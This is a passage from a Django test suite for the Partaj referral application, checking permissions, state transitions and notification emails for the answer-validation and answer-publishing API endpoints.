random_uuid = uuid.uuid4()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": random_uuid},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json()["errors"], [f"user {random_uuid} does not exist"]
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_in_validation_state(
self, mock_mailer_send
):
"""
New answer validations can be requested for a referral already in the
IN_VALIDATION state.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
# Make sure the validation request was built with the data we expect
validation_request = models.ReferralAnswerValidationRequest.objects.get(
answer=answer,
validator=validator,
)
# An activity was created for this validation request
self.assertEqual(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.VALIDATION_REQUESTED
).item_content_object.id,
validation_request.id,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_called_with(
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE[
"REFERRAL_ANSWER_VALIDATION_REQUESTED_TEMPLATE_ID"
],
"to": [{"email": validator.email}],
}
)
def test_referral_request_answer_validation_from_received_state(
self, mock_mailer_send
):
"""
New answer validations cannot be requested for a referral in the
RECEIVED state.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition REQUEST_ANSWER_VALIDATION not allowed from state received."
]
},
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_assigned_state(
self, mock_mailer_send
):
"""
New answer validations cannot be requested for a referral in the
ASSIGNED state.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition REQUEST_ANSWER_VALIDATION not allowed from state assigned."
]
},
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_answered_state(
self, mock_mailer_send
):
"""
New answer validations cannot be requested for a referral in the
ANSWERED state.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition REQUEST_ANSWER_VALIDATION not allowed from state answered."
]
},
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_closed_state(
self, mock_mailer_send
):
"""
New answer validations cannot be requested for a referral in the
CLOSED state.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition REQUEST_ANSWER_VALIDATION not allowed from state closed."
]
},
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
mock_mailer_send.assert_not_called()
# PERFORM ANSWER VALIDATION TESTS
def test_referral_perform_answer_validation_by_anonymous_user(
self, mock_mailer_send
):
"""
Anonymous users cannot perform a validation on an answer for a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": validation_request.id,
},
)
self.assertEqual(response.status_code, 401)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_random_logged_in_user(
self, mock_mailer_send
):
"""
Any random logged in user cannot perform a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_linked_user(self, mock_mailer_send):
"""
The linked user cannot perform a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.IN_VALIDATION, user=user
)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_linked_unit_member(
self, mock_mailer_send
):
"""
Linked unit members cannot perform a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_requested_validator_does_validate(
self, mock_mailer_send
):
"""
The user who is linked with the validation can validate the answer, regardless of
their membership of the linked unit.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
# Add an assignee to make sure they receive the relevant email
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
referral.assignees.set([assignee])
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 1
)
# Make sure the validation response was built with the data we expect
validation_request.refresh_from_db()
self.assertEqual(
validation_request.response.state,
models.ReferralAnswerValidationResponseState.VALIDATED,
)
self.assertEqual(validation_request.response.comment, "some comment")
self.assertEqual(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.VALIDATED
).item_content_object.id,
validation_request.id,
)
self.assertIsNotNone(validation_request.response)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_called_with(
{
"params": {
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"validator": validation_request.validator.get_full_name(),
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE[
"REFERRAL_ANSWER_VALIDATED_TEMPLATE_ID"
],
"to": [{"email": assignee.email}],
}
)
def test_referral_perform_answer_validation_by_requested_validator_does_not_validate(
self, mock_mailer_send
):
"""
The user who is linked with the validation can deny validation of the answer, regardless
of their membership of the linked unit.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
# Add an assignee to make sure they receive the relevant email
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
referral.assignees.set([assignee])
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 1
)
# Make sure the validation response was built with the data we expect
validation_request.refresh_from_db()
self.assertEqual(
validation_request.response.state,
models.ReferralAnswerValidationResponseState.NOT_VALIDATED,
)
self.assertEqual(validation_request.response.comment, "some other comment")
self.assertEqual(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.VALIDATION_DENIED
).item_content_object.id,
validation_request.id,
)
self.assertIsNotNone(validation_request.response)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_called_with(
{
"params": {
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"validator": validation_request.validator.get_full_name(),
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE[
"REFERRAL_ANSWER_NOT_VALIDATED_TEMPLATE_ID"
],
"to": [{"email": assignee.email}],
}
)
def test_referral_perform_answer_validation_with_nonexistent_request(
self, mock_mailer_send
):
"""
Validation cannot be performed (even by a linked unit member) when there is no existing
validation request.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
answer.referral.units.get().members.add(user)
random_uuid = uuid.uuid4()
response = self.client.post(
f"/api/referrals/{answer.referral.id}/perform_answer_validation/",
{
"comment": "some comment",
"state": "validated",
"validation_request": random_uuid,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json()["errors"],
[f"validation request {random_uuid} does not exist"],
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_received_state(
self, mock_mailer_send
):
"""
Answer validations cannot be performed for referrals in the RECEIVED state, even
if a validation request exists.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition PERFORM_ANSWER_VALIDATION not allowed from state received."
]
},
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(hasattr(validation_request, "response"), False)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_assigned_state(
self, mock_mailer_send
):
"""
Answer validations cannot be performed for referrals in the ASSIGNED state, even
if a validation request exists.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition PERFORM_ANSWER_VALIDATION not allowed from state assigned."
]
},
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(hasattr(validation_request, "response"), False)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_processing_state(
self, mock_mailer_send
):
"""
Answer validations cannot be performed for referrals in the PROCESSING state, even
if a validation request exists.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition PERFORM_ANSWER_VALIDATION not allowed from state processing."
]
},
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(hasattr(validation_request, "response"), False)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_answered_state(
self, mock_mailer_send
):
"""
Answer validations cannot be performed for referrals in the ANSWERED state, even
if a validation request exists.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition PERFORM_ANSWER_VALIDATION not allowed from state answered."
]
},
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(hasattr(validation_request, "response"), False)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_closed_state(
self, mock_mailer_send
):
"""
Answer validations cannot be performed for referrals in the CLOSED state, even
if a validation request exists.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
validation_request = factories.ReferralAnswerValidationRequestFactory(
answer=factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
)
user = validation_request.validator
response = self.client.post(
f"/api/referrals/{referral.id}/perform_answer_validation/",
{
"comment": "some other comment",
"state": "not_validated",
"validation_request": validation_request.id,
},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{
"errors": [
"Transition PERFORM_ANSWER_VALIDATION not allowed from state closed."
]
},
)
self.assertEqual(
models.ReferralAnswerValidationResponse.objects.all().count(), 0
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
self.assertEqual(hasattr(validation_request, "response"), False)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
mock_mailer_send.assert_not_called()
# PUBLISH ANSWER TESTS
def test_publish_referral_answer_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot publish an answer for a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/publish_answer/",
{"answer": answer.id},
)
self.assertEqual(response.status_code, 401)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_random_logged_in_user(self, mock_mailer_send):
"""
Any random logged in user cannot publish an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_linked_user(self, mock_mailer_send):
"""
The referral's creator cannot publish a draft answer themselves.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.PROCESSING, user=user
)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
response = self.client.post(
f"/api/referrals/{referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_linked_unit_member(self, mock_mailer_send):
"""
Members of the linked unit can publish a draft answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
attachment_1 = factories.ReferralAnswerAttachmentFactory()
attachment_1.referral_answers.add(answer)
attachment_2 = factories.ReferralAnswerAttachmentFactory()
attachment_2.referral_answers.add(answer)
answer.refresh_from_db()
self.assertEqual(answer.attachments.count(), 2)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ANSWERED)
self.assertEqual(response.json()["answers"][0]["content"], answer.content)
self.assertEqual(
response.json()["answers"][0]["state"], models.ReferralAnswerState.PUBLISHED
)
self.assertEqual(
len(response.json()["answers"][0]["attachments"]),
2,
)
self.assertEqual(response.json()["answers"][1]["content"], answer.content)
self.assertEqual(
response.json()["answers"][1]["state"], models.ReferralAnswerState.DRAFT
)
# Make sure the published answer was added to the related draft
published_answer = models.ReferralAnswer.objects.get(
id=response.json()["answers"][0]["id"]
)
answer.refresh_from_db()
self.assertEqual(answer.published_answer, published_answer)
self.assertEqual(published_answer.attachments.count(), 2)
# An activity was created for this published answer
self.assertEqual(
str(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.ANSWERED
).item_content_object.id
),
response.json()["answers"][0]["id"],
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_called_with(
{
"params": {
"answer_author": answer.created_by.get_full_name(),
"case_number": referral.id,
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"referral_topic_name": referral.topic.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ANSWERED_TEMPLATE_ID"],
"to": [{"email": referral.user.email}],
}
)
def test_publish_nonexistent_referral_answer_by_linked_unit_member(
self, mock_mailer_send
):
"""
When a user (like a unit member) attempts to publish an answer that does not exist,
they receive an error with an appropriate message.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
referral.units.get().members.add(user)
some_uuid = uuid.uuid4()
self.assertEqual(models.ReferralAnswer.objects.count(), 0)
response = self.client.post(
f"/api/referrals/{referral.id}/publish_answer/",
{"answer": some_uuid},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json()["errors"], [f"answer {some_uuid} does not exist"]
)
self.assertEqual(models.ReferralAnswer.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_in_validation_state(self, mock_mailer_send):
"""
A referral in the IN_VALIDATION state can go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ANSWERED)
self.assertEqual(response.json()["answers"][0]["content"], answer.content)
self.assertEqual(
response.json()["answers"][0]["state"], models.ReferralAnswerState.PUBLISHED
)
self.assertEqual(response.json()["answers"][1]["content"], answer.content)
self.assertEqual(
response.json()["answers"][1]["state"], models.ReferralAnswerState.DRAFT
)
# Make sure the published answer was added to the related draft
published_answer = models.ReferralAnswer.objects.get(
id=response.json()["answers"][0]["id"]
)
answer.refresh_from_db()
self.assertEqual(answer.published_answer, published_answer)
# An activity was created for this published answer
self.assertEqual(
str(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.ANSWERED
).item_content_object.id
),
response.json()["answers"][0]["id"],
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_called_with(
{
"params": {
"answer_author": answer.created_by.get_full_name(),
"case_number": referral.id,
"link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
"referral_topic_name": referral.topic.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ANSWERED_TEMPLATE_ID"],
"to": [{"email": referral.user.email}],
}
)
def test_publish_referral_answer_from_received_state(self, mock_mailer_send):
"""
A referral in the RECEIVED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state received."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_assigned_state(self, mock_mailer_send):
"""
A referral in the ASSIGNED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state assigned."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_answered_state(self, mock_mailer_send):
"""
A referral in the ANSWERED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
